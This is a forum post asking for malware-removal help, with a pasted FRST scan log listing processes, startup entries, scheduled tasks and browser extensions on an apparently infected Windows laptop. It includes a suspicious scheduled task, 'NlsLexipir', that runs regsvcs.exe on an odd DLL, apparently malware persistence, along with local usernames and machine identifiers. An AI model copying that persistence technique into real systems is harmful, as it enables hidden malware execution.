Folder Keeps Reappearing After Delete - Virus, Trojan, Spyware, And ...

Folder keeps reappearing after delete
Started by Jones2021Riano, May 06 2021 03:41 AM
49 replies to this topic

#1 Jones2021Riano


Posted 06 May 2021 - 03:41 AM

Good Day!

I have the same problem as this person from a previous forum: C:\ProgramData\TXQMPC keeps coming back... - Virus, Trojan, Spyware, and Malware Removal Help (bleepingcomputer.com)

I have followed the directions on how to use the FRST and here is the copied text:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 28-04-2021 Ran by FRANCIS (administrator) on LAPTOP-LOE6RFKD (LENOVO 80TU) (06-05-2021 15:34:04) Running from C:\Users\FRANCIS\Downloads Loaded Profiles: FRANCIS Platform: Windows 10 Home Single Language Version 20H2 19042.964 (X64) Language: English (United States) Default browser not detected! Boot Mode: Normal   ==================== Processes (Whitelisted) =================   (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)   (Adobe Inc. -> Adobe Inc) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (Adobe Inc. -> Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\acrotray.exe (Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe (Conexant Systems, Inc. -> Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe (Conexant Systems, Inc. -> Conexant Systems, Inc) C:\Program Files\CONEXANT\SAII\SmartAudio.exe (Conexant Systems, Inc. -> Conexant Systems, Inc.) C:\Program Files\CONEXANT\cAudioFilterAgent\CAudioFilterAgent64.exe (Conexant Systems, Inc. -> Conexant Systems, Inc.) C:\Windows\System32\SASrv.exe (Conexant Systems, Inc.) [File not signed] C:\Program Files\CONEXANT\SAII\CxUtilSvc.exe (Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.) 
C:\Program Files\Dolby\Dolby DAX2\DAX2_APP\DolbyDAX2TrayIcon.exe (Fortemedia Inc -> ) C:\Program Files\CONEXANT\ForteConfig\fmapp.exe (Intel® pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\igfxCUIService.exe (Intel® pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\igfxEM.exe (Intel® pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\IntelCpHDCPSvc.exe (Intel® pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\IntelCpHeciSvc.exe (Intel® Rapid Storage Technology -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\iaahcic.inf_amd64_f222132bfa8270de\RstMwService.exe (Lanzhou Itanium Software Technology Co., Ltd. -> Zbshareware Lab) C:\Program Files (x86)\USB Disk Security\USBGuard.exe (Lenovo -> ) C:\Program Files (x86)\Lenovo\System Update\SUService.exe (Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\PluginHost86\Lenovo.Modern.ImController.PluginHost.Device.exe (Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe (McAfee, Inc. -> McAfee LLC.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe (McAfee, Inc. -> McAfee, LLC) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe (McAfee, Inc. 
-> McAfee, LLC) C:\Windows\System32\mfevtps.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\CSP\4.1.106.0\McCSPServiceHost.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe <3> (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\ModuleCore\ProtectedModuleHost.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\VSCore_20_12\mcapexe.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\MAT\McPvTray.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\MfeAV\MfeAVSvc.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\servicehost.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\uihost.exe (McAfee, LLC. -> McAfee, LLC.) 
C:\ProgramData\McAfee\McInstruTrack\McInstruTrack.exe (Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe <19> (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe (Microsoft Corporation -> Microsoft Corporation) C:\Users\FRANCIS\AppData\Local\Microsoft\OneDrive\OneDrive.exe (Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <3> (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe <2> (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\Taskmgr.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe <2> (Microsoft Windows Publisher -> Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe <2> (Node.js Foundation -> Node.js) C:\Program Files\Adobe\Adobe Creative Cloud Experience\libs\node.exe (NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2> (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe <2> (Qualcomm Atheros -> Windows ® Win 7 DDK provider) C:\Windows\System32\AdminService.exe (Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe (Synaptics Incorporated -> Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe   ==================== Registry (Whitelisted) ===================   
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)   HKLM\...\Run: [cAudioFilterAgent] => C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent64.exe [602968 2015-12-07] (Conexant Systems, Inc. -> Conexant Systems, Inc.) HKLM\...\Run: [ForteConfig] => C:\Program Files\Conexant\ForteConfig\fmapp.exe [49056 2010-10-26] (Fortemedia Inc -> ) HKLM\...\Run: [DAX2_APP] => C:\Program Files\Dolby\Dolby DAX2\DAX2_APP\DolbyDAX2TrayIcon.exe [849920 2017-03-07] (Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.) HKLM\...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SACpl.exe [1831768 2016-08-29] (Conexant Systems, Inc. -> Conexant Systems, Inc.) HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3412680 2021-02-17] (Adobe Inc. -> Adobe Systems, Incorporated) HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated) HKLM-x32\...\Run: [USB Security] => C:\Program Files (x86)\USB Disk Security\USBGuard.exe [695528 2015-01-31] (Lanzhou Itanium Software Technology Co., Ltd. -> Zbshareware Lab) HKLM-x32\...\Run: [Adobe CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [114824 2020-07-30] (Adobe Inc. -> ) HKLM-x32\...\Run: [TeamsMachineInstaller] => C:\Program Files (x86)\Teams Installer\Teams.exe [114671912 2021-02-10] (Microsoft Corporation -> Microsoft Corporation) HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrotray.exe [5237416 2021-03-06] (Adobe Inc. -> Adobe Systems Inc.) HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Run: [BitTorrent] => C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe [2135080 2021-03-25] (BitTorrent Inc -> BitTorrent Inc.) 
HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Run: [Lync] => C:\Program Files\Microsoft Office\root\Office16\lync.exe [26374984 2021-05-02] (Microsoft Corporation -> Microsoft Corporation) HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Run: [AdobeBridge] => [X] HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\Run: [com.squirrel.Teams.Teams] => C:\Users\FRANCIS\AppData\Local\Microsoft\Teams\Update.exe [2452664 2020-12-10] (Microsoft 3rd Party Application Component -> Microsoft Corporation) HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\Run: [com.squirrel.Teams.Teams] => C:\Users\PC Gamer Jones\AppData\Local\Microsoft\Teams\Update.exe --processStart "Teams.exe" --process-start-args "--system-initiated" HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\Run: [BitTorrent] => C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe [2135080 2021-03-25] (BitTorrent Inc -> BitTorrent Inc.) HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\Run: [AdobeBridge] => [X] HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\Run: [Exetender] => "C:\Program Files (x86)\Free Ride Games\GPlayer.exe" /runonstartup HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\RunOnce: [DependencyCheck] => Performed HKLM\...\Print\Monitors\Adobe PDF Port Monitor: C:\WINDOWS\system32\AdobePDF.dll [65496 2021-02-02] (Adobe Inc. -> Adobe Systems Inc) Startup: C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GenuineService.lnk [2019-08-09] ShortcutTarget: GenuineService.lnk -> C:\Users\FRANCIS\Autodesk\Genuine Service\GenuineService.exe (Autodesk, Inc. 
-> Autodesk) Startup: C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2021-04-08] ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation) HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION   ==================== Scheduled Tasks (Whitelisted) ============   (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)   Task: {030D016F-C42A-4638-8891-3F3AD473EC60} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [141144 2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Task: {06CECE40-6FA4-4D81-9806-5215ACA506EC} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23103392 2021-04-21] (Microsoft Corporation -> Microsoft Corporation) Task: {1799BC3D-AF55-4040-97AA-B6746FAAFB67} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2103.7-0\MpCmdRun.exe [566368 2021-04-11] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {1DB835C3-2613-4254-88FD-E2BCCD03CED9} - System32\Tasks\McInstruTrack => C:\ProgramData\McAfee\McInstruTrack\McInstruTrack.exe [775360 2020-12-15] (McAfee, LLC. -> McAfee, LLC.) Task: {257132D5-DB23-4063-BC46-F6858F9477E3} - System32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1260400 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation) "C:\Windows\System32\Tasks\McAfee\McAfee Idle Detection Task" was unlocked. 
<==== ATTENTION Task: {261B4330-E64A-44CC-8530-3D8BDD56EF74} - System32\Tasks\McAfee\McAfee Idle Detection Task => {ABCDCA3B-DE6B-5A7C-B132-6D7CBA63E5C5} C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe [995848 2021-03-29] (McAfee, LLC -> McAfee, LLC) Task: {33517268-D16F-47DC-8C91-E259FE340A49} - System32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1260400 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation) Task: {3C12DCA7-5046-47AA-AD6B-04B33D166576} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2103.7-0\MpCmdRun.exe [566368 2021-04-11] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {466EBA7D-08E1-468E-92F3-C295C9758910} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [905584 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation) Task: {48D9B3B6-4450-487D-A4D0-EE744CDCA45B} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [5229504 2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Task: {490721B9-A199-4631-B59B-12050CB6CB5F} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [874472 2020-09-29] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log Task: {6320F9EA-93EA-4A88-990D-32413D851D71} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Monitor => C:\WINDOWS\system32\ImController.InfInstaller.exe [62392 2021-03-14] (Lenovo -> Lenovo Group Ltd.) 
Task: {637782C4-306B-4960-9A86-CB4EDC830D3E} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee VirusScan\upgrade.exe [4630104 2021-02-03] (McAfee, LLC -> McAfee, LLC) Task: {642F9BCA-62E6-4423-AE6F-17028198A2D9} - System32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1260400 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation) Task: {6670CD9E-0E7D-4947-9D64-60839CE52340} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [23103392 2021-04-21] (Microsoft Corporation -> Microsoft Corporation) Task: {6B183E82-1785-4DE7-821C-E43992C810C3} - System32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvBackend\NvTmRep.exe [1260400 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation) Task: {70E7D95C-F343-4480-8444-15E0F8965F4C} - System32\Tasks\Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_WeeklyTask => %windir%\System32\reg.exe add hklm\SOFTWARE\Lenovo\SystemUpdatePlugin\scheduler  /v start /t reg_dword /d 1 /f /reg:32 Task: {71643631-02C0-454A-94E7-2E21E49D1E8A} - System32\Tasks\McAfee\DAD.Execute.Updates => C:\Program Files\Common Files\McAfee\DynamicAppDownloader\1.6.102\DADUpdater.exe [4114728 2021-04-26] (McAfee, LLC -> McAfee, LLC) Task: {7AF1B6B9-494A-4503-B5CF-3AB48BC7D2C4} - System32\Tasks\Lenovo\BatteryGauge\BatteryGaugeMaintenance => C:\ProgramData\Lenovo\ImController\Plugins\LenovoBatteryGaugePackage\x64\BGHelper.exe [143888 2021-03-02] (Lenovo -> Lenovo Group Ltd.) 
Task: {7E2969D5-A5A7-4250-A26F-21D4EB53A6EC} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent => {ABCECA3B-EA5A-496B-A021-5C6BAB365E5C} C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe [995848 2021-03-29] (McAfee, LLC -> McAfee, LLC) Task: {82F7335F-144E-45F8-8E0A-FB23AA76AC60} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1790184 2021-04-30] (Avast Software s.r.o. -> Avast Software) Task: {8A1F08FE-1A68-4EDA-846F-136862319E8B} - System32\Tasks\MATLAB R2019b Startup Accelerator => C:\Program Files\MATLAB\R2019b\bin\win64\MATLABStartupAccelerator.exe [53248 2019-07-19] () [File not signed] Task: {8EF0C3D4-9F36-4C5A-B40F-9ED049FEBD76} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\59b8c9d3-b395-4eb2-8edc-6e897f84c883 => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81824 2021-03-14] (Lenovo -> Lenovo Group Ltd.) Task: {901DC0CF-2F8E-4997-9EDF-E6D41C130D8A} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [905584 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation) Task: {91E13CB6-EBE8-44AB-9331-14D7A32E45A7} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\39a63f2d-0daf-4b9b-a96d-bc584b800309 => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81824 2021-03-14] (Lenovo -> Lenovo Group Ltd.) 
Task: {93BD2383-BEA9-47CC-9D6C-EEE5A3501F2C} - System32\Tasks\TVT\TVSUUpdateTask_UserLogOn => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [1758224 2021-02-22] (Lenovo -> ) Task: {9E5D1EA3-A99B-4D01-B17C-A4732318731E} - System32\Tasks\Microsoft\NlsLexipir => C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe "C:\Program Files (x86)\Common Files\NotesDriver\ClyentrAgent\SETwm_2x80.dll" Task: {A3A4E228-8FE6-4395-8B08-E98D22A50764} - System32\Tasks\Lenovo\Lenovo Service Bridge\S-1-5-21-3936790745-3440936247-791344644-1001 => C:\Users\FRANCIS\AppData\Local\Programs\Lenovo\Lenovo Service Bridge\LSBUpdater.exe [87848 2021-05-03] (Lenovo (Beijing) Limited -> Lenovo Group Limited) Task: {B142D6B6-D6C6-4804-9BA9-92A856ADF9F3} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1557200 2021-01-25] (Adobe Inc. -> Adobe Inc.) Task: {BB90F46A-CD76-4EEA-A3F9-8BC323B4FD3A} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2103.7-0\MpCmdRun.exe [566368 2021-04-11] (Microsoft Windows Publisher -> Microsoft Corporation) Task: {C44E6E04-62B1-4B13-9759-2FF67153F57D} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [3336560 2021-04-08] (NVIDIA Corporation -> NVIDIA Corporation) Task: {C9BB156E-B929-493E-9E5D-2743713C9B37} - System32\Tasks\Microsoft\Office\Office Serviceability Manager => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\officesvcmgr.exe [4071016 2021-04-21] (Microsoft Corporation -> Microsoft Corporation) Task: {D238A51C-A36E-4720-AE7B-2697714881C7} - System32\Tasks\McAfeeLogon => C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe [740760 2021-03-31] (McAfee, LLC -> McAfee, LLC) Task: {D72A7211-88AD-4D37-AD44-D1A374E9A11A} - 
System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [645488 2021-04-07] (NVIDIA Corporation -> NVIDIA Corporation) Task: {DA539217-6EA6-4242-8857-3ACB67528549} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe [141144 2021-05-02] (Microsoft Corporation -> Microsoft Corporation) Task: {DC68A6EB-3D9A-40BD-81B8-A8C2AC8E31E3} - System32\Tasks\Lenovo\ImController\Lenovo iM Controller Scheduled Maintenance => "%windir%\system32\sc.exe" START ImControllerService Task: {E08158BD-7182-439B-89FB-AD55823E9894} - System32\Tasks\TVT\TVSUUpdateTask => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [1758224 2021-02-22] (Lenovo -> ) Task: {E0C41DCC-6827-4AFF-9AAA-28525F7C268E} - System32\Tasks\NvBatteryBoostCheckOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [874472 2020-09-29] (NVIDIA Corporation -> NVIDIA Corporation) -> -d "C:\Program Files\NVIDIA Corporation\NvBackend\NvBatteryBoostCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerBatteryBoostCheck.log Task: {E3424804-21BB-417A-984C-D46CE18CA2BA} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\e4e6c1f8-eed0-466c-8078-a92c0fd7e85a => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81824 2021-03-14] (Lenovo -> Lenovo Group Ltd.) Task: {E77F4ED0-6284-4289-AF0B-A7E350FB4A86} - System32\Tasks\Lenovo\ImController\TimeBasedEvents\d0bc3793-ac32-4e9f-9c52-27f20cb62f47 => C:\WINDOWS\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe [81824 2021-03-14] (Lenovo -> Lenovo Group Ltd.) 
Task: {E888FAEB-9001-4367-BAB5-DFB95CCD3217} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [5229504 2021-05-02] (Microsoft Corporation -> Microsoft Corporation)   (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)   Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe Task: C:\WINDOWS\Tasks\MATLAB R2019b Startup Accelerator.job => C:\Program Files\MATLAB\R2019b\bin\win64\MATLABStartupAccelerator.exe   ==================== Internet (Whitelisted) ====================   (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)   Hosts: Hosts file not detected in the default directory Tcpip\Parameters: [DhcpNameServer] 192.168.15.1 Tcpip\..\Interfaces\{204a6e4f-bb21-4465-afa7-eb9d10065002}: [DhcpNameServer] 192.168.15.1 Tcpip\..\Interfaces\{29e88bd8-7886-4ff5-af4c-24b71a9c5f1d}: [DhcpNameServer] 192.168.15.1   Edge:  ======= DownloadDir: C:\Users\FRANCIS\Downloads Edge Extension: (No Name) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [not found] Edge Extension: (No Name) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [not found] Edge Extension: (No Name) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [not found] Edge Extension: (No Name) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [not found] Edge DefaultProfile: Default Edge Profile: C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default [2021-05-06] Edge DownloadDir: 
C:\Users\FRANCIS\Downloads Edge Session Restore: Default -> is enabled. Edge Extension: (Outlook) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bjhmmnoficofgoiacjaajpkfndojknpb [2020-10-20] Edge Extension: (Hotspot Shield Free VPN Proxy - Unlimited VPN) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\cdbkakmeogejmlpgioplhjkaablahbmj [2021-02-18] Edge Extension: (Grammarly for Microsoft Edge) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\cnlefmmeadmemmdciolhbnfeacpdfbkd [2021-05-06] Edge Extension: (Adblock Plus - free ad blocker) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\gmgoamodcdcjnbaobigkjelfplakmdhh [2021-02-19] Edge Extension: (Word) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\hikhggiobiflkdfdgdajcfklmcibbopi [2020-10-20] Edge Extension: (Malwarebytes Browser Guard) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ihcjicgdanjaechkgeegckofjjedodee [2021-05-06] Edge Extension: (Momentum) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jdoanlopeanabgejgmdncljhkdplcfed [2021-05-06] Edge Extension: (Excel) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\leffmjdabcgaflkikcefahmlgpodjkdm [2020-10-20] Edge Extension: (PowerPoint) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\opfacbhaojodjaojgocnibmklknchehf [2020-10-20] Edge Extension: (Mapua Enrollment Bot) - C:\Users\FRANCIS\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\pboendiadmllnchnkaooickindpppinl [2021-02-18] Edge HKLM-x32\...\Edge\Extension: [ihcjicgdanjaechkgeegckofjjedodee]   FireFox: ======== FF DefaultProfile: gwnyf9lv.default FF ProfilePath: C:\Users\FRANCIS\AppData\Roaming\Mozilla\Firefox\Profiles\gwnyf9lv.default [2021-03-30] FF ProfilePath: 
C:\Users\FRANCIS\AppData\Roaming\Mozilla\Firefox\Profiles\6ew9mwxv.default-release [2021-05-04] FF Extension: (Greasemonkey) - C:\Users\FRANCIS\AppData\Roaming\Mozilla\Firefox\Profiles\6ew9mwxv.default-release\Extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2021-03-30] FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi FF Extension: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi [2021-02-01] FF HKLM\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\McAfee\MSKHKLM => not found FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Browser\WCFirefoxExtn\WebExtn\signed_extn\adobe_acrobat-1.0-windows.xpi FF HKLM-x32\...\Thunderbird\Extensions: [[email protected]] - C:\Program Files\McAfee\MSK FF Extension: (McAfee Anti-Spam Thunderbird Extension) - C:\Program Files\McAfee\MSK [2021-04-28] [Legacy] [not signed] FF Plugin: @mcafee.com/MSC,version=10 -> C:\Program Files\McAfee\MSC\npMcSnFFPl64.dll [2021-03-31] (McAfee, LLC -> ) FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2021-05-02] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @mcafee.com/MSC,version=10 -> C:\Program Files (x86)\McAfee\MSC\npMcSnFFPl.dll [2021-03-31] (McAfee, LLC -> ) FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2021-04-08] (Microsoft Corporation -> Microsoft Corporation) 